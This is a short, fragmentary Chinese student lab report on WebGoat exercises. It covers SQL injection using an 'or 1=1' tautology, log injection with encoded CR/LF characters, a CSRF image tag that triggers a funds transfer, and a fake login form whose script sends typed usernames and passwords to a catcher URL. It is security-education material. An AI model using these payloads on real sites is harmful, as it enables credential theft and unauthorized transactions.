目录
inspect Elementf12查看网页源代码
view按钮,执行代码结果如下:
value=‘101‘进行修改,添加or 1=1构成永真式,如图:

2329%0d%0aLogin Succeeded for username: 162329其中%0d和%0a为回车符和换行符。
<form>
<br><br><HR><H3>This feature requires account login:</H3 ><br><br>
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name = "pass"><br>
</form><br><br><HR>
<script>
function hack()
{
alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value);
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + ";
}
</script>

<img src="http://localhost:8080/WebGoat/attack? Screen=261&menu=900&transferFunds=2329"/>点击提交后结果如下:
通过本次实验真实的感受了什么是SQL注入,XSS攻击和CRSF攻击,在实验中了解了其中的流程,也自己总结了对这些攻击的防御方法,感觉受益匪浅。
2018-2019-2 20162329 《网络对抗技术》Exp9: Web安全基础
原文:https://www.cnblogs.com/Zhangxusheng/p/10926028.html